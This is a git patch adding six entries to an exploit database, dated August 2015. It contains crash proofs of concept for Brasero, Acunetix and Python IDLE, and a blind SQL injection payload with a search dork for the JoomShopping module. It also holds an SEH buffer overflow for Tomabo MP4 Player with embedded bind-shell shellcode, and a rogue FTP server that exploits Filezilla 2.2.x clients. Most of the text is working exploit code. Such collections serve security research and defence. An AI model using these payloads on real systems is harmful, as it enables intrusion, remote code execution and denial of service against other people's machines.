From 648b463161e19bd3ea647d924cdbb5decffeb95c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 9 Aug 2015 05:02:36 +0000 Subject: [PATCH] DB: 2015-08-09 6 new exploits --- files.csv | 6 + platforms/linux/dos/37743.pl | 43 +++++ platforms/php/webapps/37714.txt | 11 ++ platforms/windows/dos/37719.py | 21 +++ platforms/windows/dos/37727.py | 21 +++ platforms/windows/local/37730.py | 58 +++++++ platforms/windows/remote/37729.py | 260 ++++++++++++++++++++++++++++++ 7 files changed, 420 insertions(+) create mode 100755 platforms/linux/dos/37743.pl create mode 100755 platforms/php/webapps/37714.txt create mode 100755 platforms/windows/dos/37719.py create mode 100755 platforms/windows/dos/37727.py create mode 100755 platforms/windows/local/37730.py create mode 100755 platforms/windows/remote/37729.py diff --git a/files.csv b/files.csv index 113cbc355..3f964221f 100755 --- a/files.csv +++ b/files.csv @@ -34040,10 +34040,12 @@ id,file,description,date,author,platform,type,port 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80 +37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0 37717,platforms/windows/dos/37717.pl,"KMPlayer 3.9.x - .srt Crash PoC",2015-07-31,"Peyman Motevalli Manesh",windows,dos,0 37718,platforms/windows/dos/37718.py,"T-Mobile Internet Manager - Contact Name Crash PoC",2015-07-31,"SATHISH ARTHAR",windows,dos,0 +37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash PoC",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0 37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0 @@ -34051,9 +34053,13 @@ id,file,description,date,author,platform,type,port 37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80 +37727,platforms/windows/dos/37727.py,"Python IDLE 2.7.8 - Crash PoC",2015-08-07,"Hadi Zomorodi Monavar",windows,dos,0 +37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0 +37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031 +37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0 diff --git a/platforms/linux/dos/37743.pl b/platforms/linux/dos/37743.pl new file mode 100755 index 000000000..210d3f779 --- /dev/null +++ b/platforms/linux/dos/37743.pl @@ -0,0 +1,43 @@ +#!/usr/bin/perl -w +# Title : Kali (brasero) - Crash Proof Of Concept +# website : https://www.kali.org/downloads/ +# Tested : kali 1.x +# +# +# Author : Mohammad Reza Espargham +# Linkedin : https://ir.linkedin.com/in/rezasp +# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com +# Website : www.reza.es +# Twitter : https://twitter.com/rezesp +# FaceBook : https://www.facebook.com/mohammadreza.espargham +# +# + +#Demo : http://youtu.be/XMu5ZXupbOI + +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); + + +$path="/tmp/r3z4.m3u"; +my $PoC = "\x41" x 10000 ; +open(crash , ">", $path); +print crash $PoC; +close(crash); + + +use threads; + + +sub check_app { #thread sub + system("brasero $path"); + return 0; +} + +my @threads; +for (my $i = 0; $i < 20; $i++) { + my $thread = threads->create(\&check_app); + push(@threads, $thread); +} +foreach (@threads) { #join + $_->join(); +} \ No newline at end of file diff --git a/platforms/php/webapps/37714.txt b/platforms/php/webapps/37714.txt new file mode 100755 index 000000000..2fb8e7f8a --- /dev/null +++ b/platforms/php/webapps/37714.txt @@ -0,0 +1,11 @@ +# Exploit Title: [JoomShopping Blind Sql injection] +# Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"] +# Date: [2015-07-24] +# Exploit Author: [Mormoroth] +# Vendor Homepage: [http://www.webdesigner-profi.de] +# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html] +# Version: [All] +# Tested on: [Linux] +---------------------------- +site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a +---------------------------- \ No newline at end of file diff --git a/platforms/windows/dos/37719.py b/platforms/windows/dos/37719.py new file mode 100755 index 000000000..0aa3bd104 --- /dev/null +++ b/platforms/windows/dos/37719.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python +# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept +# Website : https://www.acunetix.com +# Tested : win 7 / win 8.1 / win vista +# +# +# Author : Hadi Zomorodi Monavar +# Email : zomorodihadi@gmail.com +# +# 1 . run python code : python poc.py +# 2 . open hadi.txt and copy content to clipboard +# 3 . open "Acunetix Web Vulnerability Scanner 9.5" +# 4 . from Tools Explorer --> subdomain scanner +# 5 . Paste ClipBoard on "Domain" +# 6 . Click start +# 7 . Crashed ;) + +crash = "\x41"*9000 #B0F +file = open("hadi.txt", "w") +file.write(crash) +file.close() \ No newline at end of file diff --git a/platforms/windows/dos/37727.py b/platforms/windows/dos/37727.py new file mode 100755 index 000000000..e9f1ea751 --- /dev/null +++ b/platforms/windows/dos/37727.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python +# Title : Python IDLE 2.7.8 - Crash Proof Of Concept +# Website : http://www.python.org/idle/ +# Tested : Windows 7 / Windows 8.1 +# +# +# Author : Hadi Zomorodi Monavar +# Email : zomorodihadi@gmail.com +# +# 1 . run python code : python poc.py +# 2 . open r3z4.txt and copy content to clipboard +# 3 . open "python 2.7.8 IDLE" +# 4 . from Menu (edit --> find) +# 5 . Paste ClipBoard on "find" +# 6 . Enter +# 7 . Crashed ;) + +crash = "\x41"*900000 #B0F +file = open("r3z4.txt", "w") +file.write(crash) +file.close() \ No newline at end of file diff --git a/platforms/windows/local/37730.py b/platforms/windows/local/37730.py new file mode 100755 index 000000000..f4e99e39c --- /dev/null +++ b/platforms/windows/local/37730.py @@ -0,0 +1,58 @@ +#!/usr/bin/python +# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow +# Date: 03/08/2015 +# Exploit Author: Saeid Atabaki +# E-Mail: bytecod3r gmail.com, saeid Nsecurity.org +# Linkedin: https://www.linkedin.com/in/saeidatabaki +# Vendor Homepage: http://tomabo.com/mp4-player/index.html +# Version: 3.11.3 +# Tested on: Windows XP SP3 +#---------------------------------------------------------------------# +# Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"' +# +# nc 192.168.11.136 8080 +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# C:\Documents and Settings\Administrator\Desktop> +#---------------------------------------------------------------------# + +import sys, struct +file="crash.m3u" + +# Windows bind shell port 8080, feel free to swap shellcode +sc = "" +sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31" +sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50" +sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40" +sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5" +sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55" +sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7" +sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6" +sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7" +sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47" +sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13" +sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b" +sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23" +sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67" +sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2" +sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c" +sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3" +sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f" +sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34" +sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f" +sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d" +sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9" +sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68" +sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2" +sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73" +sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe" +sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c" +sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33" +sc += "\x6c\x19\xa9\x11" + +payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc + +writeFile = open (file, "w") +writeFile.write( payload ) +writeFile.close() \ No newline at end of file diff --git a/platforms/windows/remote/37729.py b/platforms/windows/remote/37729.py new file mode 100755 index 000000000..79d190351 --- /dev/null +++ b/platforms/windows/remote/37729.py @@ -0,0 +1,260 @@ +# Exploit Title: Filezilla client 2.2.X SEH buffer overflow exploit +# Date: 02/08/2015 +# Exploit Author: ly0n +# Vendor Homepage: filezilla-project.org/ +# Software Link: http://www.oldapps.com/filezilla.php?app=7cdf14e88e9dfa85fb661c1c6e649e90 +# Version: tested on filezilla 2.2.21 +# Tested on: Windows XP sp3 english + + +#!/usr/bin/env python2 +# coding: utf-8 +import os,socket,threading,time +#import traceback + +# visit: ly0n.me +# greetz: NBS + +#MSGBOX "BrokenByte" +msgbox = ("\x68\x6e\x33\x72\x00\x68\x75\x74" +"\x69\x30\x68\x5e\x58\x65\x63\x89" +"\xe3\x68\x20\x20\x20\x00\x68\x68" +"\x65\x72\x65\x68\x77\x61\x73\x20" +"\x68\x6e\x33\x72\x20\x68\x75\x74" +"\x69\x30\x68\x5e\x58\x65\x63\x89" +"\xe1\x31\xc0\x50\x53\x51\x50\x50" +"\xbe\xea\x07\x45\x7e\xff\xe6\x31" +"\xc0\x50\xb8\x12\xcb\x81\x7c\xff" +"\xe0") + +nops = "\x90" * 100 +#77EA9CAC POP POP RET kernel32.dll <- seh +#EB069090 SHORT JUMP 6 POS + 2 NOPS <- nseh +nseh = "\xeb\x06\x90\x90" +seh = "\xAC\x9C\xEA\x77" + +allow_delete = False +local_ip = "192.168.11.6" #SERVER LOCAL IP +local_port = 21 #DESIRED PORT + +buffer1 = "\x41" * 1896 + nseh + seh + nops + msgbox + nops +buffer = buffer1 + ".txt" +currdir=os.path.abspath('.') + +class FTPserverThread(threading.Thread): + def __init__(self,(conn,addr)): + self.conn=conn + self.addr=addr + self.basewd=currdir + self.cwd=self.basewd + self.rest=False + self.pasv_mode=False + threading.Thread.__init__(self) + + def run(self): + self.conn.send('220 Welcome!\r\n') + while True: + cmd=self.conn.recv(256) + if not cmd: break + else: + print 'Recieved:',cmd + try: + func=getattr(self,cmd[:4].strip().upper()) + func(cmd) + except Exception,e: + print 'ERROR:',e + #traceback.print_exc() + self.conn.send('500 Sorry.\r\n') + + def SYST(self,cmd): + self.conn.send('215 UNIX Type: L8\r\n') + def OPTS(self,cmd): + if cmd[5:-2].upper()=='UTF8 ON': + self.conn.send('200 OK.\r\n') + else: + self.conn.send('451 Sorry.\r\n') + def USER(self,cmd): + self.conn.send('331 OK.\r\n') + def PASS(self,cmd): + self.conn.send('230 OK.\r\n') + #self.conn.send('530 Incorrect.\r\n') + def QUIT(self,cmd): + self.conn.send('221 Goodbye.\r\n') + def NOOP(self,cmd): + self.conn.send('200 OK.\r\n') + def TYPE(self,cmd): + self.mode=cmd[5] + self.conn.send('200 Binary mode.\r\n') + + def CDUP(self,cmd): + if not os.path.samefile(self.cwd,self.basewd): + #learn from stackoverflow + self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) + self.conn.send('200 OK.\r\n') + def PWD(self,cmd): + cwd=os.path.relpath(self.cwd,self.basewd) + if cwd=='.': + cwd='/' + else: + cwd='/'+cwd + self.conn.send('257 \"%s\"\r\n' % cwd) + def CWD(self,cmd): + chwd=cmd[4:-2] + if chwd=='/': + self.cwd=self.basewd + elif chwd[0]=='/': + self.cwd=os.path.join(self.basewd,chwd[1:]) + else: + self.cwd=os.path.join(self.cwd,chwd) + self.conn.send('250 OK.\r\n') + + def PORT(self,cmd): + if self.pasv_mode: + self.servsock.close() + self.pasv_mode = False + l=cmd[5:].split(',') + self.dataAddr='.'.join(l[:4]) + self.dataPort=(int(l[4])<<8)+int(l[5]) + self.conn.send('200 Get port.\r\n') + + def PASV(self,cmd): # from http://goo.gl/3if2U + self.pasv_mode = True + self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.servsock.bind((local_ip,0)) + self.servsock.listen(1) + ip, port = self.servsock.getsockname() + print 'open', ip, port + self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' % + (','.join(ip.split('.')), port>>8&0xFF, port&0xFF)) + + def start_datasock(self): + if self.pasv_mode: + self.datasock, addr = self.servsock.accept() + print 'connect:', addr + else: + self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) + self.datasock.connect((self.dataAddr,self.dataPort)) + + def stop_datasock(self): + self.datasock.close() + if self.pasv_mode: + self.servsock.close() + + + def LIST(self,cmd): + self.conn.send('150 Here comes the directory listing.\r\n') + print 'list:', self.cwd + self.start_datasock() + dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n" + dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n" + self.datasock.send("total 2\r\n"+dirlist) + self.stop_datasock() + self.conn.send('226 Directory send OK.\r\n') + + def toListItem(self,fn): + st=os.stat(fn) + fullmode='rwxrwxrwx' + mode='' + for i in range(9): + mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-' + d=(os.path.isdir(fn)) and 'd' or '-' + ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime)) + return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn) + + def MKD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + os.mkdir(dn) + self.conn.send('257 Directory created.\r\n') + + def RMD(self,cmd): + dn=os.path.join(self.cwd,cmd[4:-2]) + if allow_delete: + os.rmdir(dn) + self.conn.send('250 Directory deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def DELE(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + if allow_delete: + os.remove(fn) + self.conn.send('250 File deleted.\r\n') + else: + self.conn.send('450 Not allowed.\r\n') + + def RNFR(self,cmd): + self.rnfn=os.path.join(self.cwd,cmd[5:-2]) + self.conn.send('350 Ready.\r\n') + + def RNTO(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + os.rename(self.rnfn,fn) + self.conn.send('250 File renamed.\r\n') + + def REST(self,cmd): + self.pos=int(cmd[5:-2]) + self.rest=True + self.conn.send('250 File position reseted.\r\n') + + def RETR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/') + print 'Downlowding:',fn + if self.mode=='I': + fi=open(fn,'rb') + else: + fi=open(fn,'r') + self.conn.send('150 Opening data connection.\r\n') + if self.rest: + fi.seek(self.pos) + self.rest=False + data= fi.read(1024) + self.start_datasock() + while data: + self.datasock.send(data) + data=fi.read(1024) + fi.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + + def STOR(self,cmd): + fn=os.path.join(self.cwd,cmd[5:-2]) + print 'Uplaoding:',fn + if self.mode=='I': + fo=open(fn,'wb') + else: + fo=open(fn,'w') + self.conn.send('150 Opening data connection.\r\n') + self.start_datasock() + while True: + data=self.datasock.recv(1024) + if not data: break + fo.write(data) + fo.close() + self.stop_datasock() + self.conn.send('226 Transfer complete.\r\n') + +class FTPserver(threading.Thread): + def __init__(self): + self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.sock.bind((local_ip,local_port)) + threading.Thread.__init__(self) + + def run(self): + self.sock.listen(5) + while True: + th=FTPserverThread(self.sock.accept()) + th.daemon=True + th.start() + + def stop(self): + self.sock.close() + +if __name__=='__main__': + ftp=FTPserver() + ftp.daemon=True + ftp.start() + print 'On', local_ip, ':', local_port + raw_input('Enter to end...\n') + ftp.stop() +